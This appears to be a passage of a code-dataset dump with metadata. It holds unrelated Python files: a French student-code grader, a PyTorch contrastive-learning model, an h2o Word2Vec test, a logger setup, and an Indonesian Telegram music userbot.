"CookieMonster.py", "file_name": 
"CookieMonster.py", "file_ext": "py", "file_size_in_byte": 3999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.put", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 102, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 103, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 104, "usage_type": "attribute"}]} +{"seq_id": "69802206914", "text": "import sys\nimport json \nimport random\nimport io\n\ndico_good = { \"success\": True , \"errormessages\" : \"\" , \"execution\": \"OK\", \"feedback\": \"ok\", \"other\": \"\" }\ndico_bad = { \"success\": False , \"errormessages\" : \"\", \"execution\": \"\", \"feedback\": \"modifier votre valeur\", \"other\": \"\" }\n\nstudent=None\ndef hiddenimport():\n\tglobal student\n\t'''\n\tréalise l'import de student\n\tsi il y a un problème d'execution termine l'execution du grader avec les informations de l'exception.\n\tredirection de la sortie standard dans un StringIO pour ne pas polluter la sortie standard.\n\t'''\n\ttry:\n\t\tbob = io.StringIO()\n\t\toldstd = sys.stdout\n\t\tsys.stdout = bob\n\t\timport student\n\t\tsys.stdout=oldstd\n\texcept Exception as e:\n\t\tsys.stdout=oldstd\n\t\tdico_bad[\"errormessages\"]= str(e)\n\t\tdico_bad[\"execution\"]= bob.getvalue()\n\t\tdico_bad[\"feedback\"]= \"Ecrivez du code syntaxiquement correct\"\n\t\tprint(json.dumps(dico_bad))\n\t\tsys.exit(1)\n\n\nhiddenimport()\n\n# le code haut dessus de cette ligne ne seras plus visible dans la prochaine version\n\na=random.randint(1,20)\nb=random.randint(1,20)\n\nif not 'binop' in student.__dict__:\n\tdico_bad[\"errormessages\"]= \"Fonction binop non définie\"\n\tdico_bad[\"execution\"]= \"\"\n\tdico_bad[\"feedback\"]= \" veuillez écrire une fonction binop avec le mot clef def \" \n\tprint(json.dumps(dico_bad))\nelif student.binop(a,b) == a*b :\n\tdico_good[\"execution\"]= \"la fonction binop(%s , %s ) retourne un résultat exacte %s \" % (a,b,student.binop(a,b))\n\tprint(json.dumps(dico_good)) \nelse:\n\tdico_bad[\"execution\"] = \"la fonction binop(%s , %s ) retourne un résultat erroné %s alors que le résultat attendu est %s\" % (a,b,binop(a,b),a*b) \n\tprint(json.dumps(dico_bad))\n\n", "repo_name": "plgitlogin/demo", "sub_path": "python/exemples/hiddenimport.py", "file_name": "hiddenimport.py", "file_ext": "py", "file_size_in_byte": 1652, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "io.StringIO", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.dumps", 
"line_number": 28, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "student.__dict__", "line_number": 39, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "student.binop", "line_number": 44, "usage_type": "call"}, {"api_name": "student.binop", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "13391373102", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport einops\nimport numpy as np\nfrom priorityQueue import priorityQueue_torch\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass SmCoModel(nn.Module):\n def __init__(self, base_encoder, input_dim = 3, feature_dim = 10, K = 128, m = 0.999, t = 0.07, mlp = False):\n \"\"\"\n\n :param base_encoder: encoder obj\n :type base_encoder:\n :param input_dim: encoder mdoel input dimension for initial the encoder model\n :type input_dim:\n :param feature_dim:encoder model output dimension, and also the embedding feature's number\n :type feature_dim:\n :param K: the length of the queue\n :type K:\n :param m:the momentum parameter\n :type m:\n :param t:the softmax temperature\n :type t:\n :param mlp:judge if the fc layer is only one\n :type mlp:\n \"\"\"\n super(SmCoModel, self).__init__()\n self.K = K\n self.m = m\n self.t = t\n\n self.encoder_q = base_encoder(num_classes = feature_dim)\n self.encoder_k = base_encoder(num_classes = feature_dim)\n\n if mlp:# 判定是否需要增加全连接层 正常需要增加有两个全连接层\n input_mlp = self.encoder_q.fc.weight.shape[1]# weight的维度为:output x input\n print(\"input dimension is \", self.encoder_q.fc.weight.shape)\n self.encoder_q.fc = nn.Sequential(\n nn.Linear(in_features=input_mlp, out_features=input_mlp),\n nn.ReLU(inplace=True),\n self.encoder_q.fc\n\n )\n self.encoder_k.fc = nn.Sequential(\n nn.Linear(in_features=input_mlp, out_features=input_mlp),\n nn.ReLU(inplace=True),\n self.encoder_k.fc\n )\n\n # 初始化权重 k的权重值是由q决定的 并且无反向传播\n for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):\n param_k.data.copy_(param_q)\n param_k.requires_grad = False\n\n # 定义queue queue初始化的时候 是通过在0到1内随机正态分布采样进行初始化\n self.register_buffer(\"queue\", torch.randn([feature_dim, self.K]))\n self.queue = F.normalize(self.queue, dim=0)\n self.register_buffer(\"queue_ptr\", torch.zeros(1, dtype=torch.long))# 指针 操控队列\n\n # 三种权重生成算法\n # 计算q和k_queue的权重 相似度越小/距离越大 权重越大 相似度越大/距离越小 权重越小\n @torch.no_grad()\n def _weight_method_euclidean(self, q):\n \"\"\"\n\n :param q: q_embedding\n :type q: [bs, c]\n :param self.queue: the queue of k_embedding\n :type self.queue:[c, k]\n :return:weight\n :rtype:[bs, queue_length]\n \"\"\"\n bs = q.size()[0]\n k_length = self.queue.shape[-1]\n k_queue = self.queue.T # [128, 10]->[k, c]\n\n # xq [bs, queue_len, feature_num]\n xq = einops.repeat(q, \"b c->b n c\", n = k_length)\n\n # xk [bs, queue_len, feature_num]\n xk = einops.repeat(k_queue, \"k c->n k c\", n=bs)\n\n # all_embedding_eluc [bs, queue_len] [i, j] 代表 第i个batch中 第k_queue[j]与q的欧式距离\n all_embedding_eluc = torch.norm(xq-xk, p=2, dim=-1)\n weight = 1/(1+all_embedding_eluc)\n # print(f\"the weight is{weight}, and the shape is {weight.shape} \")\n return weight\n\n\n\n @torch.no_grad()\n 
def _weight_method_cos_similarity(self, q):\n \"\"\"\n\n 注意一点 相似度代表的是相似程度 常用余弦相似度 余弦相似度相似度越大 代表越相似 但是这里越相似我们需要的权重值越小\n 所以不能用余弦相似度 这里采用的是正弦相似度 正弦相似度越大 代表越不相似 和所需权重相吻合\n :param q: q_embedding\n :type q: [bs, c]\n :param self.queue: the queue of k_embedding\n :type self.queue:[c, k]\n :return:weight\n :rtype:[bs, queue_length]\n \"\"\"\n bs = q.size()[0]\n k_length = self.queue.shape[-1]\n k_queue = self.queue.T # [128, 10]->[k, c]\n\n # xq [bs, queue_len, feature_num]\n xq = einops.repeat(q, \"b c->b n c\", n=k_length)\n\n # xk [bs, queue_len, feature_num]\n xk = einops.repeat(k_queue, \"k c->n k c\", n=bs)\n cos_sim = torch.cosine_similarity(xq, xk, dim=-1)\n # print(f\"cos_sim shape is{cos_sim.shape}, and the num is {cos_sim}\")\n # 计算正弦相似度\n sin_sim = 1-cos_sim**2\n # print(f\"weight shape is{sin_sim.shape}, and the num is {sin_sim}\")\n weight = sin_sim\n # 归一化处理\n # weight = .5+.5*cos_sim\n return weight\n\n @torch.no_grad()\n def _dijkstra(self, adj):\n n = adj.size()[0]\n distance = np.inf * torch.ones(n)\n distance[0] = 0\n q = priorityQueue_torch(0)\n while not q.is_Empty():\n v, dv = q.top()\n v = int(v)\n q.pop()\n if dv != distance[v]:\n continue\n for i, weight in enumerate(adj[v]):\n if weight < 0:\n continue\n if weight == 0 and i != v:\n continue\n else:\n to = i\n if distance[v] + weight < distance[to]:\n distance[to] = distance[v] + weight\n q.push(torch.tensor([to, distance[to]]))\n\n return distance\n\n @torch.no_grad()\n def _weight_method_isomap(self, q, n_node=5):\n \"\"\"\n\n :param q: query embedding\n :type q: [bs c]\n :param n_node: the k num that we wanna get to approximate the eluc distance\n :type n_node: int\n :return: weight\n :rtype: [bs, queue_length]\n \"\"\"\n bs = q.size()[0]\n k_queue_t = self.queue.T#[k, c]\n xk = einops.repeat(k_queue_t, \"k c->n k c\", n=bs)# [bs k c]\n xq = q.unsqueeze(1)# [bs 1 c]\n all = torch.cat([xq, xk], dim=1)# [bs, k+1, c]\n # print(all.shape)\n new_k_len = self.K+1\n xall = einops.repeat(all, \"b k c->b k n c\", n=new_k_len)\n yall = einops.repeat(all, \"b k c->b n k c\", n=new_k_len)\n all_eluc = torch.norm(xall-yall, p=2, dim=-1)\n value, index = torch.topk(input=all_eluc, k=new_k_len-n_node, dim=-1, sorted=True, largest=False)\n source = torch.zeros(all_eluc.shape).to(device)\n source -= 1\n new_all_eluc = torch.scatter(dim=2, index=index, input=all_eluc, src=source)\n distance = None\n for i in range(bs):\n if distance is None:\n distance = self._dijkstra(new_all_eluc[i])\n else:\n distance = torch.vstack([distance, self._dijkstra(new_all_eluc[i])])\n # print(distance)\n distance = distance[:, 1:]\n new_distance = torch.where(torch.isinf(distance), torch.full_like(distance, 0), distance)\n mx = torch.max(new_distance)\n new_distance = torch.where(torch.isinf(distance), torch.full_like(distance, mx+1), distance)\n weight = 1/(1+new_distance).to(device)\n # print(weight.shape)\n # [bs k]\n return weight\n\n @torch.no_grad()\n def _momentum_update_key_encoder(self):\n \"\"\"\n Momentum update of the key encoder\n \"\"\"\n for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):\n param_k.data = param_k.data * self.m + param_q.data * (1. 
- self.m)\n\n @torch.no_grad()\n def _update_queue_weight(self, weight, bs):\n \"\"\"\n Update the queue weight as weighted neg sample\n weight shape is [bs k]\n \"\"\"\n # assert list(weight.shape)[0]==self.K\n weight = weight.to(device)\n x_queue = einops.repeat(self.queue, \"c k->n c k\", n=bs)# x_queue[bs c k]\n bs_weighted_queue = torch.einsum(\"bck,bk->bck\", [x_queue, weight])\n # shape is [bs c k]\n return bs_weighted_queue\n\n @torch.no_grad()\n def _dequeue_and_enqueue(self, keys):\n bs = keys.size()[0]\n ptr = int(self.queue_ptr)\n # print(ptr)\n assert self.K % bs == 0\n # print(keys.T.shape)\n # print(self.queue[:, ptr:ptr+bs].shape)\n # 主要是为了防止训练的batch 不完全的问题\n if (keys.T.shape[1] == self.queue[:, ptr:ptr+bs].shape[1]):\n self.queue[:, ptr:ptr+bs] = keys.T\n else:\n l = self.queue[:, ptr:ptr+bs].shape[1]\n self.queue[:, ptr:ptr+bs] = keys.T[:, :l]\n self.queue[:, 0:(ptr+bs)%self.K] = keys.T[:, l:]\n # self.queue[:, ptr:ptr+bs] = keys.T\n ptr = (ptr + bs) % self.K\n self.queue_ptr[0] = ptr\n\n @torch.no_grad()\n def _generate_weight(self, q, method=\"i\"):\n \"\"\"\n generate the weight of the queue's neg vec\n :return:weight\n :rtype:[K]\n \"e\" is _weight_method_euclidean()\n \"\"\"\n # return torch.randn([4, self.K]).to(device=device)\n # weight = self._weight_method_euclidean(q)\n if method == \"e\":\n # print(\"\\033[31;1m{}\\033[0m\".format(\"the weight generated method you are uing is euclidean\"))\n weight = self._weight_method_euclidean(q).cuda(0)\n elif method == \"c\":\n # print(\"\\033[31;1m{}\\033[0m\".format(\"the weight generated method you are uing is sin_similarity\"))\n weight = self._weight_method_cos_similarity(q).cuda(0)\n elif method == \"none\":\n # print(\"\\033[31;1m{}\\033[0m\".format(\"you are not using weight generated method\"))\n weight = torch.zeros([q.size()[0], self.K])+1\n else:\n # print(\"\\033[31;1m{}\\033[0m\".format(\"the weight generated method you are uing is isomap\"))\n weight = self._weight_method_isomap(q).cuda(0)\n # weight = self._weight_method_isomap(q)\n # print(\"weight is \", weight)\n return weight\n\n def forward(self, img_q, img_k):\n \"\"\"\n\n :param img_k: a batch of key image\n :type img_k: [bs channels w h]\n :param img_q: a batch of query image\n :type img_q: [bs channels w h]\n :return: logits label\n :rtype:\n \"\"\"\n bs = img_q.size()[0]\n q = self.encoder_q(img_q)\n q = F.normalize(q, dim=-1)\n\n # self._weight_method_isomap(q)\n\n with torch.no_grad():\n self._momentum_update_key_encoder()\n k = self.encoder_k(img_k )\n k = F.normalize(k, dim=-1)\n weight = self._generate_weight(q)\n # shape[bs c k]\n bs_weighted_queue = self._update_queue_weight(weight=weight, bs=bs)#[]\n # l_pos = [N, 1]\n l_pos = torch.einsum('nc,nc->n', [q, k]).unsqueeze(-1)\n # l_neg = [N, K]\n l_neg = torch.einsum('nc,nck->nk', [q, bs_weighted_queue.detach()])\n\n # logits = [N, K+1]\n logits = torch.cat([l_pos, l_neg], dim=1)\n # temperature\n logits /= self.t\n\n labels = torch.zeros(logits.shape[0], dtype=torch.long).cuda()\n\n #dequeue and enqueue\n self._dequeue_and_enqueue(k)\n return logits, labels\n\n\n\n# def main():\n# image = torch.randn([4, 1, 28, 28]).to(device=device)\n# # model = Encoder(_input_dim=1, _output_dim=10).to(device=device)\n# smco_model = SmCo(Encoder, input_dim=1, feature_dim=10).to(device=device)\n# logits, labels = smco_model(image, image)\n# # print(f\"logits is {logits}, labels is {labels}\")\n# print(f\"logits shape is {logits.shape}, label shape is {labels.shape}\")\n#\n#\n#\n# if __name__ == 
'__main__':\n# main()", "repo_name": "EricSalvatore/SmPro", "sub_path": "SMCO/SmCo.py", "file_name": "SmCo.py", "file_ext": "py", "file_size_in_byte": 11699, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.device", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 60, "usage_type": "attribute"}, {"api_name": "einops.repeat", "line_number": 80, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 64, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 111, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.cosine_similarity", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 128, "usage_type": "call"}, {"api_name": "priorityQueue.priorityQueue_torch", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 165, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 168, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.scatter", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.vstack", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 183, "usage_type": 
"call"}, {"api_name": "torch.isinf", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.full_like", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.isinf", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.full_like", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 191, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 269, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 269, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 276, "usage_type": "name"}, {"api_name": "torch.einsum", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 283, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 290, "usage_type": "attribute"}]} +{"seq_id": "13350670654", "text": "import h2o\nfrom h2o.exceptions import H2OValueError\n\nfrom tests import pyunit_utils\nfrom h2o.estimators.word2vec import H2OWord2vecEstimator\n\n\ndef pubdev_5112():\n words = h2o.create_frame(rows=10, cols=1, string_fraction=1.0, missing_fraction=0.0)\n embeddings = h2o.create_frame(rows=10, cols=100, real_fraction=1.0, missing_fraction=0.0)\n word_embeddings = words.cbind(embeddings)\n\n w2v_model = H2OWord2vecEstimator.from_external(external=word_embeddings)\n\n model_id = w2v_model.model_id\n model = h2o.get_model(model_id)\n\n assert model, \"Worder2Vec model without a training frame was retrieved\"\n\n # Only leading column should be of type String\n leading_column_string_error = False\n try:\n string_frame = h2o.create_frame(rows=10, cols=10, real_fraction=1.0, missing_fraction=0.0)\n H2OWord2vecEstimator.from_external(external=string_frame)\n except H2OValueError:\n leading_column_string_error = True\n\n assert leading_column_string_error, \"Word2Vec pre-trained model should be checked for the leading column\" \\\n \" to be string\"\n # Other columns should be non-string type\n multiple_string_columns_error = False\n try:\n string_frame = h2o.create_frame(rows=10, cols=10, string_fraction=1.0, missing_fraction=0.0)\n H2OWord2vecEstimator.from_external(external=string_frame)\n except H2OValueError:\n multiple_string_columns_error = True\n\n assert multiple_string_columns_error, \"Word2Vec pre-trained model should be checked for columns not to have a\" \\\n \" String type except for the leading column\"\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pubdev_5112)\nelse:\n pubdev_5112()\n", "repo_name": "h2oai/h2o-3", "sub_path": 
"h2o-py/tests/testdir_jira/pyunit_pubdev_5112.py", "file_name": "pyunit_pubdev_5112.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "h2o.create_frame", "line_number": 9, "usage_type": "call"}, {"api_name": "h2o.create_frame", "line_number": 10, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator.from_external", "line_number": 13, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator", "line_number": 13, "usage_type": "name"}, {"api_name": "h2o.get_model", "line_number": 16, "usage_type": "call"}, {"api_name": "h2o.create_frame", "line_number": 23, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator.from_external", "line_number": 24, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator", "line_number": 24, "usage_type": "name"}, {"api_name": "h2o.exceptions.H2OValueError", "line_number": 25, "usage_type": "name"}, {"api_name": "h2o.create_frame", "line_number": 33, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator.from_external", "line_number": 34, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator", "line_number": 34, "usage_type": "name"}, {"api_name": "h2o.exceptions.H2OValueError", "line_number": 35, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 42, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "7962417730", "text": "from activecampaign3.config import CONFIG\nimport logging\nimport os\n\nlogsdir = CONFIG['logs']['dir']\nlog_level = getattr(logging, CONFIG['logs']['level'].upper())\n\nlogger = logging.getLogger(\"activecampaign3\")\nos.makedirs(logsdir, exist_ok=True)\nlogfilepath = os.path.join(logsdir, CONFIG['logs']['file'])\nh = logging.FileHandler(logfilepath)\nh.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nh.setFormatter(formatter)\nlogger.addHandler(h)\nlogger.setLevel(log_level)\n\nlogger.info(\"log init\")\n", "repo_name": "batsimprov/activecampaign3", "sub_path": "activecampaign3/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "activecampaign3.config.CONFIG", "line_number": 5, "usage_type": "name"}, {"api_name": "activecampaign3.config.CONFIG", "line_number": 6, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "activecampaign3.config.CONFIG", "line_number": 10, "usage_type": "name"}, {"api_name": "logging.FileHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "74321602753", "text": "import os\nimport sys\nfrom datetime import datetime\nfrom time import time\n\nfrom pyrogram import Client, filters\nfrom pyrogram.types import Message\n\nfrom config import HNDLR, SUDO_USERS\n\n# System Uptime\nSTART_TIME = datetime.utcnow()\nTIME_DURATION_UNITS = (\n (\"Minggu\", 60 * 60 * 24 * 7),\n 
(\"Hari\", 60 * 60 * 24),\n (\"Jam\", 60 * 60),\n (\"Menit\", 60),\n (\"Detik\", 1),\n)\n\n\nasync def _human_time_duration(seconds):\n if seconds == 0:\n return \"inf\"\n parts = []\n for unit, div in TIME_DURATION_UNITS:\n amount, seconds = divmod(int(seconds), div)\n if amount > 0:\n parts.append(\"{} {}{}\".format(amount, unit, \"\" if amount == 1 else \"\"))\n return \", \".join(parts)\n\n\n@Client.on_message(filters.command([\"ping\"], prefixes=f\"{HNDLR}\"))\nasync def ping(client, m: Message):\n await m.delete()\n start = time()\n current_time = datetime.utcnow()\n m_reply = await m.reply_text(\"⚡\")\n delta_ping = time() - start\n uptime_sec = (current_time - START_TIME).total_seconds()\n uptime = await _human_time_duration(int(uptime_sec))\n await m_reply.edit(\n f\"🏓 PONG `{delta_ping * 1000:.3f} ms` \\n⏳ AKTIF - `{uptime}`\"\n )\n\n\n@Client.on_message(\n filters.user(SUDO_USERS) & filters.command([\"restart\"], prefixes=f\"{HNDLR}\")\n)\nasync def restart(client, m: Message):\n await m.delete()\n loli = await m.reply(\"1\")\n await loli.edit(\"2\")\n await loli.edit(\"3\")\n await loli.edit(\"4\")\n await loli.edit(\"5\")\n await loli.edit(\"6\")\n await loli.edit(\"7\")\n await loli.edit(\"8\")\n await loli.edit(\"9\")\n await loli.edit(\"**✅ Userbot Di Mulai Ulang**\")\n os.execl(sys.executable, sys.executable, *sys.argv)\n quit()\n\n\n@Client.on_message(filters.command([\"help\"], prefixes=f\"{HNDLR}\"))\nasync def help(client, m: Message):\n await m.delete()\n HELP = f\"\"\"\n👋 Hallo {m.from_user.mention}!\n\n🛠 MENU BANTUAN\n\n⚡ PERINTAH UNTUK SEMUA ORANG\n• {HNDLR}play [judul lagu | link youtube | balas file audio] - untuk memutar lagu\n• {HNDLR}vplay [judul video | link youtube | balas file video] - untuk memutar video\n• {HNDLR}playlist untuk melihat daftar putar\n• {HNDLR}ping - untuk cek status\n• {HNDLR}help - untuk melihat daftar perintah\n\n⚡ PERINTAH UNTUK SEMUA ADMIN\n• {HNDLR}resume - untuk melanjutkan pemutaran lagu atau video\n• {HNDLR}pause - untuk untuk menjeda pemutaran lagu atau video\n• {HNDLR}skip - untuk melewati lagu atau video\n• {HNDLR}end - untuk mengakhiri pemutaran\n\"\"\"\n await m.reply(HELP)\n\n\n@Client.on_message(filters.command([\"repo\"], prefixes=f\"{HNDLR}\"))\nasync def repo(client, m: Message):\n await m.delete()\n REPO = f\"\"\"\n👋 Hallo {m.from_user.mention}!\n\n🎶 Music Dan Video Player UserBot\n\n🤖 Telegram UserBot Untuk Memutar Lagu Dan Video Di Obrolan Suara Telegram.\n\n✨ Dipersembahkan Oleh \n• [PyTgCalls](https://github.com/pytgcalls/pytgcalls)\n• [Pyrogram](https://github.com/pyrogram/pyrogram)\n\n\n📝 Persyaratan\n• Python 3.8+\n• FFMPEG\n• Nodejs v16+\n\n🛠 MENU BANTUAN\n\n⚡ PERINTAH UNTUK SEMUA ORANG\n• `/play [judul lagu | link youtube | balas file audio]` - untuk memutar lagu\n• `/vplay [judul video | link youtube | balas file video]` - untuk memutar video\n• `/playlist` untuk melihat daftar putar\n• `/ping` - untuk cek status\n• `/help` - untuk melihat daftar perintah\n\n⚡ PERINTAH UNTUK SEMUA ADMIN\n• `/resume` - untuk melanjutkan pemutaran lagu atau video\n• `/pause` - untuk untuk menjeda pemutaran lagu atau video\n• `/skip` - untuk melewati lagu atau video\n• `/end` - untuk mengakhiri pemutaran\n\n💡 Deployment\n\n💜 Heroku\n\n [𝗗𝗘𝗣𝗟𝗢𝗬 𝗞𝗘 𝗛𝗘𝗥𝗢𝗞𝗨](https://heroku.com/deploy?template=https://github.com/XtomiSN/MusicAndVideoPlayer)\n\n📚 Variabel Yang Dibutuhkan\n• `API_ID` - Dapatkan Dari [my.telegram.org](https://my.telegram.org)\n• `API_HASH` - Dapatkan Dari [my.telegram.org](https://my.telegram.org)\n• `SESSION` - Sesi 
String Pyrogram. Dapatkan String Dari [Sini](https://replit.com/@GoodBoysExe/string-session?lite=1&outputonly=1)\n• `SUDO_USER` - ID Akun Telegram Yang Digunakan Sebagai Admin\n\n\n🔥 KREDIT \n• [Dan](https://github.com/delivrance) untuk [Pyrogram](https://github.com/pyrogram/pyrogram)\n• [Laky](https://github.com/Laky-64) untuk [PyTgCalls](https://github.com/pytgcalls/pytgcalls)\n\"\"\"\n await m.reply(REPO, disable_web_page_preview=True)\n", "repo_name": "XtomiSN/MusicAndVideoPlayer", "sub_path": "MusicAndVideo/userbot.py", "file_name": "userbot.py", "file_ext": "py", "file_size_in_byte": 4416, "program_lang": "python", "lang": "id", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 34, "usage_type": "name"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 33, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 33, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 33, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 50, "usage_type": "name"}, {"api_name": "os.execl", 